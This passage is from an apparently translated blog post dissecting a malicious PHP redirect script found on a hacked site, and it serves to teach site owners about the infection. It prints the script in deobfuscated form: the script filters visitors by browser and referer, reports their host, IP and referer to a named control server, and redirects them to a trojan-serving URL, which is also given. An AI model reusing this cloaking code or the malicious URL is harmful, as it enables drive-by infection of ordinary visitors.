    }
    fclose($_11);
    $_21 = 1144;                                                        // junk
    $_20 = strpos($_2, "\r\n\r\n");
    if (4480 < mt_rand(1439, 3036)) array_flip($_14, $_20);             // junk: never true
    $_2 = substr($_2, $_20 + 4);
    $_22 = 2504;                                                        // junk
    return $_2;
}

function l__3($_7) {
    $_1 = curl_init(ADMIN_REDIR_URL);
    if (0) {                                                            // junk: (447-447+215-215) is always 0
        substr($_4, $_15, $_18);
    } else {
        mt_rand(447, 3183);
    }
    curl_setopt($_1, 42, FALSE);                                        // CURLOPT_HEADER
    $_23 = 'm';                                                         // junk
    curl_setopt($_1, 19913, TRUE);                                      // CURLOPT_RETURNTRANSFER
    if ((2508 + 4073) > 2508 || preg_replace($_20)); else { fread($_15, $_7, $_12); }   // junk: always true
    curl_setopt($_1, 13, 15);                                           // CURLOPT_TIMEOUT
    $_24 = 'jmpp';                                                      // junk
    curl_setopt($_1, 10015, $_7);                                       // CURLOPT_POSTFIELDS
    if ((1760 + 801) > 1760 || strval($_11, $_3, $_15)); else { array_merge($_13, $_1); }   // junk: always true
    $_16 = curl_exec($_1);
    curl_close($_1);
    $_25 = 4730;                                                        // junk
    return $_16;
}
?>
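The decoding above was done by hand, index by index. The same two tables can be inlined mechanically: pull the function-name array and the base64 string array out of the source, substitute every `$GLOBALS['_664181862_'][N]` and `_724562126(N)` with its decoded value, and fold the `round(0+x+x+...)` padding into the constant it always produces. The script below is an added example written for this page, not the author's tooling; it runs on a constructed excerpt shaped like the raw (unannotated) obfuscated file and assumes the table names seen on this page, so a sample with different identifiers needs only the regexes' name capture, which is generic.

```python
import base64
import math
import re

# Constructed sample: a short excerpt in the shape of the obfuscated script on
# this page (same table names and call style; the body is trimmed for the demo).
SAMPLE_SRC = r"""<?php $GLOBALS['_664181862_']=Array(base64_decode('ZGVmaW5l'), base64_decode('c3RydG9sb3dlcg=='), base64_decode('c3RycG9z'), base64_decode('aGVhZGVy')); ?><? function _724562126($i){ $a=Array( 'QURNSU5fUkVESVJfVVJM', 'aHR0cDovL3Rlc3QuY3VzdG9tc2V4Y2Ftcy5jb20vcmIvZ2V0X3VybC5waHA=', 'SFRUUF9VU0VSX0FHRU5U', 'd2luZG93cw==', 'MXo=', 'DQoNCg=='); return base64_decode($a[$i]); } ?><?php $GLOBALS['_664181862_'][0](_724562126(0),_724562126(1)); $_0=$GLOBALS['_664181862_'][1]($_SERVER[_724562126(2)]); if($GLOBALS['_664181862_'][2]($_0,_724562126(3))===false){ exit(_724562126(4)); } $_20=$GLOBALS['_664181862_'][2]($_2,_724562126(5)); $GLOBALS['_664181862_'][3](round(0+854.75+854.75+854.75+854.75)); ?>"""

# $GLOBALS['<name>']=Array(base64_decode('..'), ...);   -> function table
FUNC_TABLE_RE = re.compile(r"\$GLOBALS\['(_\d+_)'\]\s*=\s*Array\((.*?)\)\s*;", re.S)
# function <name>($i){ $a=Array('..', ...); return base64_decode($a[$i]); }  -> string table
STR_TABLE_RE = re.compile(
    r"function\s+(_\d+)\(\$i\)\s*\{\s*\$a\s*=\s*Array\((.*?)\);\s*"
    r"return\s+base64_decode\(\$a\[\$i\]\);\s*\}", re.S)
B64_CALL_RE = re.compile(r"base64_decode\('([^']*)'\)")
QUOTED_RE = re.compile(r"'([^']*)'")
# round(0+854.75+854.75+...) padding: a sum of positive literals, always the same value
JUNK_ROUND_RE = re.compile(r"round\(0((?:\+\d+(?:\.\d+)?)+)\)")


def php_round(x):
    """PHP round(): halves go away from zero (Python's round() is banker's rounding)."""
    return int(math.floor(x + 0.5)) if x >= 0 else -int(math.floor(-x + 0.5))


def php_literal(s):
    """Render a decoded string as a PHP literal; strings with control characters
    (the "\\r\\n\\r\\n" header separator, the "\\n" after Content-Type) get an
    escaped double-quoted form so they stay readable."""
    if any(ord(c) < 0x20 for c in s):
        body = (s.replace("\\", "\\\\").replace('"', '\\"').replace("$", "\\$")
                 .replace("\r", "\\r").replace("\n", "\\n").replace("\t", "\\t"))
        return '"' + body + '"'
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def decode_tables(src):
    """Return (func_table_name, [function names], string_func_name, [strings])."""
    fm = FUNC_TABLE_RE.search(src)
    sm = STR_TABLE_RE.search(src)
    if not fm or not sm:
        raise ValueError("obfuscation tables not found")
    funcs = [base64.b64decode(b).decode() for b in B64_CALL_RE.findall(fm.group(2))]
    strs = [base64.b64decode(b).decode() for b in QUOTED_RE.findall(sm.group(2))]
    return fm.group(1), funcs, sm.group(1), strs


def deobfuscate(src):
    """Inline both tables, fold the round() padding and drop the table definitions."""
    fname, funcs, sname, strs = decode_tables(src)
    out = re.sub(r"\$GLOBALS\['" + re.escape(fname) + r"'\]\[(\d+)\]",
                 lambda m: funcs[int(m.group(1))], src)
    out = re.sub(re.escape(sname) + r"\((\d+)\)",
                 lambda m: php_literal(strs[int(m.group(1))]), out)
    out = JUNK_ROUND_RE.sub(
        lambda m: str(php_round(sum(float(t) for t in m.group(1).split("+") if t))), out)
    out = FUNC_TABLE_RE.sub("", out)
    out = STR_TABLE_RE.sub("", out)
    return out


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_SRC))
```

After this pass the remaining `(3419-3419+3826-3826) ? ... : ...` ternaries and `4001 < mt_rand(1611,2385)` comparisons are plain constants, which is how the junk branches in the listing above were identified.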

Now strip out the junk:

<?php
define('ADMIN_REDIR_URL', 'http://test.customsexcams.com/rb/get_url.php');

// Take the visitor's User-Agent, lower-cased (empty if the header is absent).
if (isset($_SERVER['HTTP_USER_AGENT'])) {
    $_0 = strtolower($_SERVER['HTTP_USER_AGENT']);
} else {
    $_0 = '';
}

// Check 1: only Windows visitors. Anyone else gets "1z" and the script stops.
if (strpos($_0, 'windows') === false) {
    exit('1z');
}

// Check 2: only Opera 9.80 or Internet Explorer 7-10. Anyone else gets "2z".
$_3 = Array('opera/9.80', 'msie 10', 'msie 9', 'msie 8', 'msie 7');
$_4 = false;
foreach ($_3 as $_5) {
    if (strpos($_0, $_5) !== false) {
        $_4 = true;
        break;
    }
}
if (!$_4) {
    exit('2z');
}

// Check 3: the visitor must have come from somewhere (non-empty Referer), otherwise "3z".
if (isset($_SERVER['HTTP_REFERER'])) {
    $_6 = $_SERVER['HTTP_REFERER'];
} else {
    $_6 = '';
}
if (empty($_6)) {
    exit('3z');
}

// Build the callback parameter: d=SITE_HOST:urlencode(CLIENT_IP:REFERER)
$_SERVER['HTTP_HOST'] = strtolower($_SERVER['HTTP_HOST']);
$_SERVER['HTTP_HOST'] = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$_7 = 'd=' . urlencode($_SERVER['HTTP_HOST']) . ':' . urlencode($_SERVER['REMOTE_ADDR'] . ':' . $_6);

// Ask the control server where to send this visitor. "BAD" means no redirect: exit with "4z".
$_8 = l__0($_7);
if ($_8 == 'BAD') {
    exit('4z');
}
// Otherwise send the visitor to whatever URL the control server returned.
header('Location: ' . trim($_8));

// Choose a transport for the POST: file_get_contents, a raw socket, or curl.
function l__0($paramurl) {
    if (ini_get('allow_url_fopen') == 1) {
        return l__1($paramurl);
    } else {
        $_10 = parse_url(ADMIN_REDIR_URL);
        if ($_11 = @fsockopen($_10['host'], 80, $_12, $_13, 15)) {
            return l__2($_11, $_10['host'], $_10['path'], $paramurl);
        } elseif (@function_exists('curl_init')) {
            return l__3($paramurl);
        }
    }
}

// Transport 1: file_get_contents with a POST stream context.
function l__1($paramurl) {
    $_14 = stream_context_create(array(
        'http' => array(
            'method'  => 'POST',
            'header'  => "Content-Type: application/x-www-form-urlencoded\n",
            'content' => $paramurl,
        ),
    ));
    return file_get_contents(ADMIN_REDIR_URL, false, $_14);
}

// Transport 2: hand-written HTTP/1.0 POST over fsockopen; the response headers are cut off.
function l__2($socket, $host, $path, $paramurl) {
    fputs($socket, 'POST ' . $path . "  HTTP/1.0\r\n"
        . "Host: $host\r\n"
        . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n"
        . "Accept: */*\r\n"
        . "Accept-Language: en-us,en;q=0.5\r\n"
        . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        . 'Content-Length: ' . strlen($paramurl) . "\r\n"
        . "Content-Type: application/x-www-form-urlencoded\r\n\r\n$paramurl");
    $response = '';
    while ($buffer = fread($socket, 4096)) {
        $response .= $buffer;
    }
    fclose($socket);
    $header_end = strpos($response, "\r\n\r\n");
    $response = substr($response, $header_end + 4);
    return $response;
}

// Transport 3: curl. The numeric options are CURLOPT_HEADER (42),
// CURLOPT_RETURNTRANSFER (19913), CURLOPT_TIMEOUT (13) and CURLOPT_POSTFIELDS (10015).
function l__3($paramurl) {
    $curl = curl_init(ADMIN_REDIR_URL);
    curl_setopt($curl, 42, FALSE);
    curl_setopt($curl, 19913, TRUE);
    curl_setopt($curl, 13, 15);
    curl_setopt($curl, 10015, $paramurl);
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
}
?>


The essence of the script is a POST to test.customsexcams.com/rb/get_url.php with a single parameter of the form d=SITE_HOST:CLIENT_IP:REFERER (the client IP and the referer are urlencoded together), but only for visitors who look like Internet Explorer or Opera on Windows and arrived via a link; everyone else, including scanners and crawlers, is dropped with a short exit code before the control server is ever contacted.
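The three checks are the reason the page looks clean to most automated tools and to the site owner's own browser. The following added example (written for this page, not the author's code) replays them over a handful of constructed visitor profiles and rebuilds the `d=` parameter exactly as the script does, so that a site owner can see which user agents would ever reach the control server and what the probe has to look like. The profiles and the host/IP/referer values are made up; `quote_plus(safe="")` stands in for PHP's urlencode() (space to `+`, letters, digits, `.`, `-`, `_` kept).

```python
from urllib.parse import quote_plus

# Browser substrings the script accepts (the decoded $_3 array on this page).
TARGET_UAS = ("opera/9.80", "msie 10", "msie 9", "msie 8", "msie 7")


def gate(headers):
    """Replay the three exit checks of the redirect script, in the script's order.

    Returns 'OK' when the request would reach the get_url.php callback, otherwise
    the code the script exits with: '1z' (not Windows), '2z' (not IE/Opera),
    '3z' (no Referer). Header names are assumed to be canonical-cased."""
    ua = headers.get("User-Agent", "").lower()
    if "windows" not in ua:
        return "1z"
    if not any(s in ua for s in TARGET_UAS):
        return "2z"
    if not headers.get("Referer"):
        return "3z"
    return "OK"


def build_d_param(host, remote_addr, referer):
    """Rebuild the POST body the script sends: d=HOST:urlencode(IP:REFERER),
    with HOST lower-cased and every 'www.' removed, as str_replace does."""
    host = host.lower().replace("www.", "")
    return "d=%s:%s" % (quote_plus(host, safe=""),
                        quote_plus(remote_addr + ":" + referer, safe=""))


# Constructed visitor profiles (not taken from the original investigation).
VISITORS = {
    "googlebot": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
    "curl": {
        "User-Agent": "curl/7.29.0",
        "Referer": "http://www.google.com/"},
    "chrome": {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/27.0.1453.94 Safari/537.36",
        "Referer": "http://www.google.com/search?q=wedding+catering"},
    "ie8-direct": {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"},
    "ie8-from-google": {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
        "Referer": "http://www.google.com/search?q=wedding+catering"},
}


def classify(visitors=VISITORS):
    """Map each profile name to the gate result it would get."""
    return {name: gate(h) for name, h in visitors.items()}


if __name__ == "__main__":
    for name, verdict in classify().items():
        print("%-16s %s" % (name, verdict))
    print(build_d_param("www.Example.com", "203.0.113.5",
                        "http://www.google.com/search?q=x"))
```

Only the IE-with-a-referer profile gets through; a crawler or a default curl fails the first check and never produces a visible redirect, which is why reproducing the behaviour needs both a spoofed Windows/MSIE User-Agent and a non-empty Referer.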

Having quickly copied one of the functions, I ran my own script to go to the next step:
<?php
define('ADMIN_REDIR_URL', 'http://test.customsexcams.com/rb/get_url.php');
$purl = "d=weddingcatering.co.th:80.112.243.203%3AEach_will_be_rewarded_according_to_merit";
$_14 = stream_context_create(array(
    'http' => array(
        'method'  => 'POST',
        'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $purl,
    ),
));
$resp = file_get_contents(ADMIN_REDIR_URL, false, $_14);
echo $resp;

And received a concise reply: BAD.
Then it occurred to me to use as the site address not one of my own but the one that currently sits in the code of the 7.txt file. The answer was different:
Attention!!!
By clicking on the link below, you risk infecting your computer with a trojan!

http: //blog2.companyscoming.co:3811/books/site-map.php?radio=888&themes=883&login=82&advocacy=833&browser=79

The parameters after the "?" are generated randomly and do not matter.
Since I use the Google Chrome browser, when I went to this page I saw a 502 error. But it was enough to launch the Opera browser and I was immediately offered to run a certain Java application, which Kaspersky Anti-Virus identified as Trojan/Win32.badur.a. This malware closes all open programs (and immediately closes any you try to open) and launches itself: a certain computer virus scanner, which immediately finds a bouquet of infections on your computer and strongly suggests activating it for $60 a year ($90 for 3 years!). The infection is removed by deleting the tdefender.exe file (defender.exe) in the %AppData%\RandomName directory (in my case AppData\Roaming) and clearing the registry keys in the branches responsible for autorun (Run).

At this point my investigation came to an end.

Summary.

The scheme is as follows (the original post shows it as a diagram): a visitor coming from a search engine or social network in Internet Explorer or Opera on Windows hits the infected site; the injected script POSTs the site host, the visitor's IP and the referer to test.customsexcams.com/rb/get_url.php; the control server either answers BAD or returns a URL; the visitor is redirected to that URL, where an exploit page serves the Java trojan.

Afterword.

No site is insured against being hacked, so do not forget the simple precautions:

Source: https://habr.com/ru/post/184150/